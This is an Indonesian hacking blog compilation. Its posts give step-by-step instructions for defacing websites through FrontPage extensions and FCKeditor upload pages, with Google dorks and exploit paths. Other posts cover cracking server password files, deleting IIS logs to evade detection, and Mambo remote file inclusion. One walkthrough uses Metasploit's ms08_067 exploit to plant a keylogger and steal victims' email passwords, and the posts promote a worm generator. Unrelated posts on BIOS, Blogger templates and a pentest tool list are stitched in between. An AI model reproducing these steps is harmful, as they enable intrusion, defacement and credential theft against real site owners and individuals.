Written By solin smkcwanadadi on Selasa, 30 Oktober 2012 | 14:33
Saat ini mendeface website bukan suatu pekerjaan yang sulit. Bahkan anak kecil pun jika diberitahu cara mendeface, maka dia dapat mendeface ratusan situs!!! Dan sesungguhnya terdapat banyak cara untuk mendeface suatu situs !! Nbamun disini saya akan membahas mengenai cara yang paling mudah, kebanyakan teknik yang digunakan oleh para hacker, termasuk di Brazil, Arah, USA dan UK serta negara-negara lainnya. Dan ini bukan sekedar “joke” namun bukti dari konsep.


Contoh Web:

    * http://www.arabiandawn.com/
    * http://patent-tour.com/
    * http://hoeppner-schumann.de/catalog/images/waw.htm
    * http://style.indoasia.us/images/waw.htm
    * http://sdnbjs2bdg.sch.id/merdeka.html
    * http://www.pusatk3hiperkes.com/indonesia.htm


Cukup banyak situs besar yang telah dihack karena bug ini termasuk situs NASA !!!
Bug…………..

Pertama kali berbicara mengenai bug. OK, Bugnya ada pada ekstensi Frontpage yang ditemukan pada tahun 2000 namun masih aktif hingga hari ini !!! Ekstensi Frontpage menjadi ‘enabled’ pada Webserver yang barlainan sehingga admin dapat mengupload file ke server tersebut dari komputer manapun pada intranet! Saat ini ekstensi Frontpage menjadi ‘enabled’ pada berbagai server yang selanjutnya didefinisikan menjadi 3 file pada server IIS:
www.site.com/_vti_bin/shtml.dll
www.site.com/_vti_bin/_vti_adm/admin.dll
www.site.com/_vti_bin/_vti_aut/author.dll
Dan jika server tersebut bukan merupakan IIS tapi server jenis lain, seperti Apache maka file tersebut mempunyai ekstensi file .exe misalnya author.exe Scanning Sekarang pertanyaannya adalah bagaimana menemukan situs yang vulnerable! Atau situs yang memiliki ekstensi Frontpage yang ‘enabled’! OK, sangat mudah membuad suatu program yang dapat mencari situs yang memiliki author.dll atau author.exe dan jika file tersebut ditemukan maka server tersebut dikategorikan ‘vulnerable’. Baiklah, sebelumnya saya sudah membuat program scanner untuk keperluan pribadi tapi saat ini dapat didownload untuk publik. Anda dapat mendownload tool ini yang saya beri nama “Universal Bug Scanner” dan anda memerlukan Visual Studio yang terinstall pada computer anda agar dapat menggunakan tool ini. OK?

Selanjutnya, kumpulkan daftar situs dengan menggunakan google/alltheweb/vivisimo/britanica (atau search engine lainnya, meski saya rekomendasikan agar menggunakan www.alltheweb.com, karena banyak sekali situs yang vulnerable disini J jika dibandingkan dengan google yang mengutamakan situs-situs yang tergolong secure seperti “asp” , “iis” atau sesuatu yang seperti itu! Kumpulkan daftar situs dan simpanlah dalam suatu file.

Sekarang bukalah Universal Bug Scanner, upload file tersebut dan mulailah proses scanning untuk mencari situs-situs yang vulnerable. Dan jika anda ingin menjadi seorang elite hacker, maka sebaiknya anda menggunakan program scanner buatan anda sendiri OK? Yeah, hal ini tidak hanya meningkatkan pengetahuan tentang pemrograman anda tapi mendorong anda untuk mengembangkan program scanner yang lebih powerful meliputi jenis web server, SMTP dan berbagai jenis bug !!!
Deface!!!
1) Nah, sekarang bukalah window My Computer
2) dan double click “Web Folders”!!!
3) double click lagi “Add web folder” dan akan diminta nama situs.
4) Ketiklah nama situs yang tergolong vulnerable
5) click next
6) Setelah request diterima, click Finished.

    Tapi jika dikatakan bahwa host not found, cobalah lagi. Dan jika anda mendapatkan warning yang sama, wah,
    pasti ada masalah pada sistem windows anda. Install ulang, buddy J dan setelah suatu web folder dengan nama
    situs yang vulnerable dibuat

7) Double click dan browse file-file target selayaknya anda menggunakan komputer sendiri!!!
Rename index.html dalam server tersebut dengan nama lain, misalnya indexold.html
9) Copylah index.html karya anda sendiri ke sistem korban. Hmm.. anda sebenarnya dapat mengcopy, menghapus atau menambahkan sesuatu ke server korban dengan menggunakan web folder sederhana yang anda buat saat ini dan memperlakukannya selayaknya komputer anda sendiri!!! Keren bukan?

Cracking Password
Oopss… tapi tidak seluruh admin termasuk bodoh yang membiarkan server mereka begitu saja di hacked. Dari 6 diantara 10 admin (sepanjang serangan yang saya lakukan) memproteksi ekstensi frontpage mereka dengan Password. Jadi saat anda melakukan double click, web folder tersebut akan meminta suatu username dan password!!! Baiklah, jika anda tidak ingin mengcrack password maka cobalah cari situs lain saja. Tapi jika ingin meneruskan hacking web tersebut, maka perlu diperhatikan langkah-langkah berikut ini:

Password untuk ekstensi front page tersimpan dalam file services.pwd dengan format berikut:
username:password

Baiklah, password tersebut tersimpan dalam form yang terenkripsi menggunakan Algorithma DES
(jangan khawatir tutorial mengenai masalah enkripsi-dekripsi/kriptografi akan saya jelaskan nanti J. Ok, sekarang sama dengan algoritma yang digunakan untuk mengenkripsi password pada sistem operasi Linux.

Jadi kita dapat menggunakan linux passwd cracker untuk mengcrack file services.pwd. Arahkan browser anda ke situs www.openwall.com dan downloadlah John the Ripper cracker. Sekarang downloadlah file
services.pwd dari mesin korban dan ubahlah file services.pwd sebagaimana file passwd unix dengan tujuh field sebagai gantir dari dua yang memberikan data acak seperti:
username:password:123:123:something:/home/couldbe_myname:/bin/bash
Ok begitu kita telah memisahkan tujuh field yang terpisah dengan “:” sekarang gunakan JTR cracker untuk mengcrack password sebagaimana jika kita mengcrack file passwd linux. Dan setelah itu kita akan mendapatkan password yang sesungguhnya, masukkan dalam web folder dan lakukan proses deface !!

Hei, tunggu dulu ada hal yang berbeda dan harus diperhatikan dalam proses hacking ini!!
Menyembunyikan identitas anda saat hacking adalah seni tersendiri. Anda dapat menuliskan suatu script asp
yang akan menghapus log dan menguplad file asp tersebut ke sistem korban dan bukalah file yang sama dari
browser anda. File log untuk IIS (win2000 server) biasanya tersimpan dalam folder
C:\\\\\\\\WINNT\\\\\\\\SYSTEM32\\\\\\\\LOGFILES\\\\\\\\W3SVC32, dan jika anda tidak mengetahui format file log ini maka saya rekomendasikan untuk menghapus semua data dalam file ini. Dan jangan khawatir ada artikel yang membahas cara menghapus log, lengkap dengan source code akan segera kami rilis. Jadi saat ini saya menganggap anda melakukan deface web site melalui warung internet J keren khan!!! Ingat, sebaiknya jangan melakukan hal ini dari komputer teman anda yang akan menyeretnya dalam kesulitan yang anda timbulkan. Dan jika anda melakukannya dari komputer di rumah anda sebaiknya jangan menghapus segala
sesuatu dalam sistem tersebut, agar anda tidak dijerat oleh Undang-Undang Cyber yang berlaku.

Hmmm… deface pertama anda? Anda benar-benar beruntung. Tapi ingat hal ini tidak akan pernah menjadikan anda sebagai seorang elite hacker melainkan lamer (pengacau). Artikel ini hanya menjelaskan teknik populer yang digunakan untuk mendeface. Anda akan terkejut saat mengetahui ada banyak teknik deface yang ada di internet.





Mencari Vulnerable

Mencari vurnable disebuah website bukan hal yang mudah, harus punya kesabaran penuh dan ketelitian. Nah..! kali ini saya mau menulis gimana cara mencarii vurn di sebuah website aplikasi php.

Saya ambil contoh dari software mambo,cos banyak sekali vurn di software itu, saya ambil contoh di file contact.class.php

Contohnya:
include_once ($mosConfig_absolute_path .’/includes/vcard.class.php’)

letak file itu ada di folder components/com_contact

Misalnya mau mencari website yang masih bisa dimasuki php injection caranya gini

buka google : ketik inurl:”com_contact”

truss coba masukkan php injectnya

Misalnya www.target.com/index.php?option=com_contact&bla&bla&bla

Maka hasilnya menjadi seperti ini ----------------> www.target.com/components/com_contact/contact.class.php?mosConfig_absolute_path=shell

vurn web aplikasi php semuanya ada di depan include, include_once, require, require_once dan ada tanda $ sebelum keterangan selanjutnya seperti contoh diatas.

BIOS, singkatan dari Basic Input Output System, dalam sistem komputer IBM PC atau kompatibelnya (komputer yang berbasis keluarga prosesor Intel x86) merujuk kepada kumpulan rutin perangkat lunak.

BIOS kadang-kadang juga disebut sebagai firmware karena merupakan sebuah perangkat lunak yang disimpan dalam media penyimpanan yang bersifat hanya baca. Hal ini benar adanya, karena memang sebelum tahun 1995, BIOS selalu disimpan dalam media penyimpanan yang tidak dapat diubah. Seiring dengan semakin kompleksnya sebuah sistem komputer , maka BIOS pun kemudian disimpan dalam EEPROM atau Flash Memory yang dapat diubah oleh pengguna, sehingga dapat di-upgrade (untuk mendukung prosesor yang baru muncul, adanya bug yang mengganggu kinerja atau alasan lainnya).

Meskipun demikian, proses update BIOS yang tidak benar (akibat dieksekusi secara tidak benar atau ada hal yang mengganggu saat proses upgrade dilaksanakan) dapat mengakibatkan motherboard mati mendadak, sehingga komputer pun tidak dapat digunakan karena perangkat yang mampu melakukan proses booting (BIOS) sudah tidak ada atau mengalami kerusakan.

Oleh karena itu, untuk menghindari kerusakan (korupsi) terhadap BIOS, beberapa motherboard memiliki BIOS cadangan . Selain itu, kebanyakan BIOS juga memiliki sebuah region dalam EEPROM/Flash memory yang tidak dapat di-upgrade, yang disebut sebagai "Boot Block". Boot block selalu dieksekusi pertama kali pada saat komputer dinyalakan. Kode ini dapat melakukan verifikasi terhadap BIOS, bahwa kode BIOS keseluruhan masih berada dalam keadaan baik-baik saja (dengan menggunakan metode pengecekan kesalahan seperti checksum, CRC, hash dan lainnya) sebelum mengeksekusi BIOS. Jika boot block mendeteksi bahwa BIOS ternyata rusak, maka boot block akan meminta pengguna untuk melakukan pemrograman BIOS kembali dengan menggunakan floppy disk yang berisi program flash memory programmer dan image BIOS yang sama atau lebih baik. Pembuat motherboard sering merilis update BIOS untuk menambah kemampuan produk mereka atau menghilangkan beberapa bug yang mengganggu.

BIOS mampu melakukan hal-hal berikut:

1. Inisialisasi (penyalaan) serta pengujian terhadap perangkat keras (dalam proses yang disebut dengan Power On Self Test, POST)
2. Memuat dan menjalankan sistem operasi
3. Mengatur beberapa konfigurasi dasar dalam komputer (tanggal, waktu, konfigurasi media penyimpanan, konfigurasi proses booting, kinerja, serta kestabilan komputer)
4. Membantu sistem operasi dan aplikasi dalam proses pengaturan perangkat keras dengan menggunakan BIOS Runtime Services.

BIOS menyediakan antarmuka komunikasi tingkat rendah, dan dapat mengendalikan banyak jenis perangkat keras (seperti keyboard). Karena kedekatannya dengan perangkat keras, BIOS umumnya dibuat dengan menggunakan bahasa rakitan (assembly) yang digunakan oleh mesin yang bersangkutan.

Istilah BIOS pertama kali muncul dalam sistem operasi CP/M, yang merupakan bagian dari CP/M yang dimuat pada saat proses booting dimulai yang berhadapan secara langsung dengan perangkat keras (beberapa mesin yang menjalankan CP/M memiliki boot loader sederhana dalam ROM). Kebanyakan versi DOS memiliki sebuah berkas yang disebut "IBMBIO.COM" (IBM PC-DOS) atau "IO.SYS" ( MS-DOS) yang berfungsi sama seperti halnya CP/M disk BIOS.

Dalam BIOS, terdapat beberapa komponen dasar, yakni sebagai berikut:

• Program BIOS Setup yang memungkinkan pengguna untuk mengubah konfigurasi komputer (tipe harddisk, disk drive, manajemen daya listrik, kinerja komputer, dll) sesuai keinginan. BIOS menyembunyikan detail-detail cara pengaksesan perangkat keras yang cukup rumit apabila dilakukan secara langsung.

• Driver untuk perangkat-perangkat keras dasar, seperti video adapter, perangkat input, processor, dan beberapa perangkat lainnya untuk sistem operasi dasar 16-bit (dalam hal ini adalah keluarga DOS).

• Program bootstraper utama yang memungkinkan komputer dapat melakukan proses booting ke dalam sistem operasi yang terpasang.

BIOS juga sering disebut sebagai ROM BIOS karena pada awalnya BIOS disimpan dalam chip Read Only Memory (ROM) dalam motherboard. Mengapa disimpan di dalam ROM, adalah agar BIOS dapat dieksekusi pada waktu komputer dinyalakan, tanpa harus menunggu untuk menyalakan perangkat media penyipanan terlebih dahulu (yang memakan waktu lama). BIOS dalam komputer PC modern disimpan dalam chip ROM yang dapat ditulis ulang secara elektrik atau Flash ROM. Karena itulah, sekarang sebutan Flash BIOS lebih populer dibandingkan dengan ROM BIOS. Berikut ini adalah beberapa chip ROM yang digunakan sebagai tempat penyimpanan BIOS.

Meskipun BIOS disimpan dalam ROM, konfigurasi BIOS tidak disimpan dalam ROM, (hal ini disebabkan oleh sifat ROM yang statis) melainkan sebuah chip terpisah yang disebut sebagai Real-time clock (RTC), yang berupa sebuah Non-Volatile Random Access Memory (NVRAM). NVRAM juga sering disebut sebagai Complimentary Metal-Oxide Random Access Memory (CMOS RAM), karena menggunakan metode pembuatan CMOS. Karena menggunakan metode pembuatan CMOS, NVRAM membutuhkan daya yang sangat kecil agar dapat bekerja. Meskipun disebut non-volatile, NVRAM sebenarnya merupakan sebuah chip yang volatile, sehingga data yang tersimpan di dalamnya dapat terhapus dengan mudah jika daya listrik yang menghidupinya terputus. Oleh karena itu, NVRAM "dihidupi" oleh sebuah baterai (mirip baterai kalkulator atau jam) dengan bahan Litium dengan seri CR-2032. Sebuah baterai Litium CR-2032 dapat menghidupi NVRAM selama tiga hingga lima tahun. Jika daya dalam baterai habis, atau daya yang disuplainya terputus (akibat dicabut dari slotnya), maka semua konfigurasi akan dikembalikan ke kondisi standar, sesuai ketika BIOS tersebut diprogram oleh pabrikan. BIOS umumnya memberikan laporan CMOS Checksum Error atau NVRAM Checksum Error.

Di terbitkan oleh : solin

Postingan kali ini saya akan menjelaskan bagaimana Cara Membuat Tampilan Blog berbeda di setiap Halaman.
Cantohnya bisa di lihat di postingan sebelumnya.
Di postingan yang sebelumnya tampilannya sedikit berbeda dengan postingan yang sekaran ini.
Jika ada yang tertarik berikut cara membuatnya :

Seperti biasa sobat harus login ke Blogger
Klik Rancangan → Edit HTML
Klik tulisan Download Template Lengkap
Silahkan save dulu template tersebut, ini di maksudkan untuk mengurangi resiko apabila terjadi kesalahan ketika melakukan editting pada template, kita masih punya back up data untuk mengembalikannya seperti semula
Beri tanda centang pada kotak di samping tulisan Expand Template Widget
Kemudian cari kode ]]></b:skin>

Tips : Untuk mempercepat pencarian sobat bisa gunakan tombol Ctrl + F atau (F3)

jika sudah ketemu letakan kode berikut setelah kode ]]></b:skin>

<style type='text/css'>
<b:if cond='data:blog.url == &quot;URL posting yang tampilannya ingin di bedakan&quot;'>

Letakkan style template sobat yang berbeda

</b:if>
</style>

Keterangan : Ganti tulisan yang berwarna biru dengan URL postingan sobat yang tampilannya ingin di bedakan
Lalu ganti yang berwarna hitam dengan style template sobat yang berbeda.
jika sudah selesai SIMPAN TEMPLATE dan lihat hasilnya

Selamat mencoba

Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip :
Download DISINI

Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!

tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.

Biasanya di internet memang ditawarkan download software pembuka zip,rar,7Zip yang terkunci, namun kita wajib mengeluarkan biaya, paling tidak mereka hanya menawarkan program trial yang ada expire datenya. Tetapi jika kamu adalah pengguna Linux (kalau kamu tidak punya Linux, silahkan file tersebut bawa kepada teman kamu yang mempunyai OS Linux dan ekstrak di komputernya, kemudian transfer file-file tersebut ke USB dan bawa pulang.


RarCrack adalah solusi yang bagus sebagai cara membuka file zip,rar,7zip yang terproteksi password.


Utility kecil yang bernama RarCrack dijalankan dengan command line.

silahkan didownload disini atau http://sourceforge.net/projects/rarcrack/ secara gratis atau freeware. Dengan metode brute-force algoritma, RarCrack dapat dengan cerdas membongkar sandi rahasia file rar, atau zip yang terkunci.


Cara menggunakannya :
RarCracknya dijalan terlebih dahulu.. Kemudian Drag (pindahkan)File Zip, Rar, 7Zip yang di pasword ke dalam RarCrack..
selesai . . .


@ingat
aplikasi ini hanya dapat bekerja di linux saja.

Dani Firmansyah A.K.A Xnuxer
nuxer, nama panggilan Dani Firmansyah di dunia bawah tanah, di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta.



Jumat 16 April, Xnuxer mencoba melakukan tes sistem sekuriti kpu.go.id melalui XSS (cross site scripting) dari IP 202.158.10.117, namun dilayar keluar message risk dengan level low (website KPU belum tembus atau rusak).

Sabtu 17 April 2004 pukul 03.12,42, Xnuxer mencoba lagi melakukan penetrasi ke server tnp.kpu.go.id dengan cara SQL Injection dan berhasil menembus IP tnp.kpu.go.id 203.130.201.134, serta berhasil meng-up date daftar nama partai pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang dipakai Xnuxer dalam meng-hack yakni melalui teknik spoofing (penyesatan). Xnuxer melakukan serangan dari IP 202.158.10.117, kemudian membuka IP Proxy Anonymous Thailand 208.147.1.1 sebelum msuk ke IP tnp.kpu.go.id 203.130.201.134, dan berhasil membuka tampilan nama 24 partai politik peserta pemilu.

Beruntung Xnuxer meng-hack situs KPU hanya karena ingin mengetes keamanan sistem keamanan server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat Xnuxer yang sangat cooperatif, akhirnya Xnuxer hanya di bui beberapa bulan saja.



Onno W. Purbo A.K.A Kang Onno

Onno Widodo Purbo (lahir di Bandung 17 Agustus 1962; umur 45 tahun) adalah seorang tokoh (yang kemudian lebih dikenal sebagai pakar di bidang) teknologi informasi asal Indonesia. Ia memulai pendidikan akademis di ITB pada jurusan Teknik Elektro pada tahun 1981. Enam tahun kemudian ia lulus dengan predikat wisudawan terbaik, kemudian melanjutkan studi ke Kanada dengan beasiswa dari PAU-ME.

RT/RW-Net adalah salah satu dari sekian banyak gagasan yang dilontarkan. Ia juga aktif menulis dalam bidang teknologi informasi media, seminar, konferensi nasional maupun internasional. Percaya filosofy copyleft, banyak tulisannya dipublikasi secara gratis di internet.

Pejuang kemerdekaan frekuensi 2.4 GHz, VOIP-Rakyat, dan Antena Wifi dari kaleng.



I Made Wiryana A.K.A Pak Made

Cyber Paspampres nih, konon website dan server President SBY beliau yang pegang untuk maintenance dan keamanannya… (pernah digempur ampe DDos, namun dalam waktu itungan detik back-up server –ga tau dah back-up yang nomor berapa– langsung up).

Beliau juga pelopor perkembangan linux di indonesia bersama pak Rusmanto (redaktur Info Linux) and yangh pasti dia Dosen gw (GUNADARMA), menyelesaikan pendidikan di dua institusi pendidikan yaitu S1-Fisika Universitas Indonesia pada tahun 1991 dan S1-manajemen Informatika STIMIK Gunadarma tahun 1992 dan melanjutkan Magister di eidith cowan university Australia dan sejak tahun 2004 sampai sekarang sedang menyelesaikan program Doktoral di RVS Bielfield Jerman. Dan sekarang berdomisili di Jerman. Status pekerjaannya adalah Dosen Tetap universitas Gunadarma.

forumkami.NET

Pernah gaa saat googling buat cari informasi penting ehh tiba2 ketemu di forum yang belum kita tahu dan ternyata harus daftar dulu atau login biar bisa lihat informasinya?

pasti terasa sangat malas kalau daftar lagi,
betull gaaa ??

tenang aja barusan tadi saya juga merasakan itu kog, sebelum posting artikel ini tadi saya iseng2 cari ebook bertema sulap di indowebster ehhh malah ada tulisan di salah satu keterangannya 'pass di forum'.

wahh nanti kalau saya download percuma dong nanti saya ga bisa buka filenya.
terus menurut feeling saya wahh pasti ini pass ada di forum Indowebster (IDWS) kalau akun idws saya punya tapi kalau forumnya saya nggaa punyaa. hehehe

jadi berfikir balik nii,
mauu download apa gaa yaa?
tiba2 saya ingat salah satu trik yang saya dapat dari forum biasanya ini niii http://xcode.or.id/forum2
forum kebanggaan indonesia kaskus.us juga lohhh hehehhe

okee deh dari pada cerita terus
begini caranya untuk dapat akun login.

silahkan akang2 mba2 masuk disini http://bugmenot.com

caranya:
silahkan masukan nama link forum di kotak input link disana
lihat gambar

gantikan www.example.com dengan link forum yang ingin dituju.
jika sudah tekan get logins.
lihat apa hasilnyaa ???


selamat mencobaa...

Iseng-iseng again,,,hwhhwhwhhw,,,mengapa judulnya kayak gini, iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama bos minjem laptop luh bos buat mindahin data-data, abis itu seminggu kemudian balik lagi pake alesan bos data-data w kemaren ketinggalan dilaptop luh. Gue minjem lagi dong dengan harapan password email or facebook temennya udah kecantol di jebakan keylogger miliknya,,tapi tutorial kali ini, gak perlu repot2 kok, gak perlu mondar mandir dua kali..Tutorial kali ini kita exploit rekaman keyboard tanpa menyentuh laptop korbannya...dengan modal kita tau ipaddress korban aja udah beres,,Linux gituh Lhhhooooooo...

OK deh langsung aja, tanpa basa basi..

Peralatannya adalah :
-Angry IP Scanner (Buat scanning ipaddress)
-Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)
-Metasploit (Sangat penting buat exploitnya)

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :

nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:

liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh....sampe keakar2nya bikin intall ulang dalem hitungan detik...Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa...lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:

5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:

Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:

8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:

9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:

coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:

OK kelar deh,,ya kan bener kan gak perlu mondar mandir nyentuh komputer korbannya buat ngedapetin sesuatu yg ente mau

Masih ingat bagaimana puluhan Website milik Badan Pemerintah Malaysia di hack oleh Hacker hacker Indonesia

Timbul pertanyaan ? Bagaimana caranya . bukan kah Website tersebut juga punya sisi security, tapi kenapa bisa dengan mudah di tembus oleh hacker Indonesia.
Dengan membaca ebook ini, akan terlihat jelas bagaimana cara mendeface dan cara pengamanannya bila Website anda di serang juga. Buah karya seorang Hacker, yaitu S. McClure, Saumil Shah dan Shreeraj Shah, Sangat bagus dan jelas
Di lengkapi juga ilustrasi Topologi Jaringan..

1 Kata Untuk Ebook Ini, WAJIB DI DOWNLOAD & Sangat Bermanfaat!
Ebook pertama:




Ebook kedua:




Selamat belajar & selamat berjuang..

Assalamualaikum..teman-teman.
Saya mau menampilkan lagi teknik deface :D
Kali ini, saya akan memberikan kpada anda smua teknikny.
Disini saya akan membahas 4 teknik deface yang mngkin di pakai defacer.
Saya termasuk Org yg anti mnggunkan tools pada saat mendeface website :D
Okay, lngsung aja....cekidot

1. Powered by CubeCard.

2. Powered By OpenCart

3. Powered By OscMax V 2.0

4. Connector Txt

1. Powered CubeCart

Adalah module Deface Upload file, kita bisa menggunakan cara ini.

Dork    : Powered By CubeCart V 3.0

Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html 

Contoh: www.test.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

2. Powered By OpenCart

Dork   :  Powered By OpenCart

Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Contoh : www.asu.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

3. Powered By OscMax V 2.0

Dork    : Powered By OscMax V 2.0

Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html

Contoh ;www.cekcu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

4. Hacking TXt.

Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima :D 

Dork   : Inurl:/FCKeditor/editor/filemanager/

Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

 

Semua yang saya tulis adalah dalam bntuk FCkeditor, khusus upload file :D

Cara pakainya:

1. Connector >> Pilih "PHP"

2. Klik Upload.

3. Jika Berhasil ada tulisa "file upload No eror"

4. Buka Get Folder utk mndptkan patch URL

5. Jika sudah, ketik nama file yg anda upload td.

TUTORIAL: SOLIN

1) YOU CAN CRACK WITH USERNAMES AND PASSWORDS OR COMBOS
2) I WILL USE ORON AS AN EXAMPLE AND I WILL CRACK WITH COMBOS (RECOMMENDED)











Tools : http://www.fileserve.com/file/Zkzs84U

Klo masih kurang paham bisa PM ane.
100% WORKING DI SAYA.

Ubuntu Pentest Edition [ NodeZero ], OS-nya Hacker dan IT Security

NodeZero adalah linux berbasis Ubuntu yang dirancang sebagai sebuah sistem lengkap yang juga dapat digunakan untuk pengujian penetrasi. NodeZero menggunakan repositori Ubuntu sehingga sistem anda akan selalu up to date, dan sistem dasarnya dirancang untuk instalasi disk dan kustomisasi yang di inginkan.

Sama halnya dengan Backtrack 4, NodeZero dilengkapi dengan 300 tools untuk penetrasi dan tools uji keamanan lainya, dilengkapi repositori pentest sehingga sistem akan selalu update setiap waktu, NodeZero bisa didownload disini.

berikut list tools dalam Ubuntu NodeZero:
Enumeration
Archive
metagoofil
seat
DNS
dnsenum
dnsmap
dnspredict
dnstracer
fierce
host
Route
0trace
Ass
intrace
netenum
netmask
nmbscan
protos
tcptraceroute
tctrace
SMTP
pirana
relayscanner
Searchengine
bing-ip2hosts
gggooglescan
gooscan
metagoofil
pygoogle
subdomainer
urlcrazy
Dradis
dradis client
dradis server
Maltego v2.0.2CE
Network
Identify Live Hosts
Angry IP Scanner
fping
genlist
hping3
netcat
netdiscover
nmap
onesixtyone
outputpbnj
scanpbnj
sslscan
tcptraceroute
unicornscan
Zenmap
OS Fingerprinting
nmap
p0f
protos
sslscan
unicornscan
Xprobe2
Zenmap
Port Scan
genlist
netcat
nmap
outputpbnj
scanpbnj
sslscan
unicornscan
Zenmap
Service Fingerprinting
complemento
httsquash
letdown
reverserider
amap
httprint
httprint GUI
Virtual Private Network
ikeprobe
ike-scan
PSK-Crack
Web Analysis & Attack
Web
–Httprint
–httprint
–httprint GUI
–W3af
–w3af
–w3af console

asp-audit
BurpSuite
curl
DirBuster
GrendelScan
lynx
nessus
nikto
openAcunetix
Paros Proxy
ProxyStrike
ratproxy
Short to Real URL
skipfish
Social Engineering Toolkit
SpikeProxy
wapiti
Webscarab
wfuzz

Cisco
Cisco Auditing Tool
cisco global exploiter
cisco-torch
copy-router-config
OCS
Database
MS-SQL
metacoretex
MS-SQLscan
sqlinjector
SQLiX
sqlmap
sqlninja
SQLScan
mysql
metacoretex
sqlinjector
sqlmap
sqlus
SQLiX
Oracle DB
–Oracle Auditing Tools
–Oracle Password Guesser
–OracleQuery
–Oracle Sam Dump
–OracleSysExec
–Oracle TNS Control

DBPwAudit
sqlinjector
SQLiX
sqlmap

Fuzzing
Fuzzgrind
fuzzgrind
Fuzzgrind GUI
bed
bunny
file format fuzzing framework
Genereal Purpose Fuzzer
jbrofuzz
SMB Analysis
samrdump
Smb4K
smbclient
SNMP Analysis
Mibble::Mib Parser
MibbleBrowser
net-snmp tools
net-snmp tools collection
admsnmp
scli – SNMP Management tools
snmpcheck
snmpenum
snmp-fuzz
OpenVAS
openVAS add user
openVAS client
openVAS makecert
openVAS remove user
openVAS server
Exploiting
FastTrack
fast-track
fast-track GUI
Inguma
inguma
Metasploit Framework
msfcli
msfconsole
msfgui
msfpayload
msfweb
Password Lists
Password Lists
Password Lists Web
Privilege Escalation
Password Attacks
–File Attack
–fcrackzip
–pdfcrack
